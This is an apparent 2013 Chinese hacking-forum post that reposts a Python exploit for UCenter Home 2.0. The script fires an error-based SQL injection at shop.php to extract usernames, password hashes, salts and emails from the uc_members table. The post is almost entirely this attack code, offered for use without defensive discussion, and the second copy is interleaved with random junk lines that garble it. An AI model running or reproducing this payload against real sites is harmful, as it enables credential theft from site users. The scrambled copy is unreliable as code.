中国网络渗透测试联盟
标题:
UCenter Home 2.0 EXP
[打印本页]
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:
http://www.exploit-db.com/exploits/14997/'
print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
+ o2 j" J, K$ Q
( g9 M- n9 V4 t; {
o0 Z' a& S0 H
#!/usr/bin/env python
2 }0 O& n7 g) L* t0 h2 X
, j, [0 }' A0 ?5 |+ O
import sys
3 L# t( C' m6 z0 n9 z
import urllib2
9 M+ `; t8 [+ r9 s6 P
import re
' U" c( } w* P, ^5 V
V. n8 a, B& M% @1 G, { o& x
def info():
5 {9 H9 D* w# B; p
print 'From:
http://www.exploit-db.com/exploits/14997/'
% q& ?7 V! V2 A8 i4 `
print 'http://www.hake.cc/Web_loudong/'
2 o# B. U3 b7 p8 r7 l$ p* c, |
print 'changed:qiaoy'
' e% \: J) B9 }# v! m
print 'exp:'
' k, R8 {& @: G- _3 h- @8 a! ]( L
print ' ./UCenter_Home_2.0.py site'
8 K X9 v% n, `
2 t' R$ m. g+ j1 [$ B, H+ X- m
def main():
) T6 x" d5 W* @: D1 }( u; H
if len(sys.argv) != 2:
, A, s( c$ x: _/ M9 |
info()
M) a! l4 W1 l. j/ k
else:
# \4 ?5 ?0 ?! l8 e( _4 x( j
site = sys.argv[1]
8 y: E: C. x1 Z. y" R- D9 }
if site[0:7] == 'http://':
2 ~/ [. x" F, u5 \
sitesite =site
2 A* a9 ~- a! h9 }6 V6 I
elif site[0:8] == 'https://':
7 r5 [, |! h2 C& d- U8 n
sitesite = site
- j( A; C z2 D k, K4 }
else:
- s/ j3 U) P: W0 a$ t( |
site = 'http://'+site
+ K( ^( H3 A$ \. O8 {: S
try:
7 Y m& R- W: u( o( G h9 q
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
; j7 ?8 z2 _; Z9 U+ Z- ^
Value = urllib2.urlopen(url).read()
% x w4 k) d) c* P) x3 l b
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
, |- } W( R, c9 z e: p( ~* d
hacked = Msg.split(':')
6 s( q/ w) V& a1 K
print 'Name: '+hacked[1]
4 m, ?' { M3 F/ o$ g" T
print 'Passwd: '+hacked[2]
5 X& B7 t0 Y& j
print 'salt: '+hacked[3]
# s6 R- m$ n* g
print 'email: '+hacked[4]
+ A+ }% l. ?# \
except:
6 u% a& Y+ A, X+ v4 ]9 R' k/ I
print 'Sorry,I can\'t work............'
3 ]7 ?' \* z- g+ T" _5 r! q* m
" q" _3 Y+ @1 r# N& u
if __name__ == '__main__':
b6 z# x8 j2 l& O* _! K! C% A
main()
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2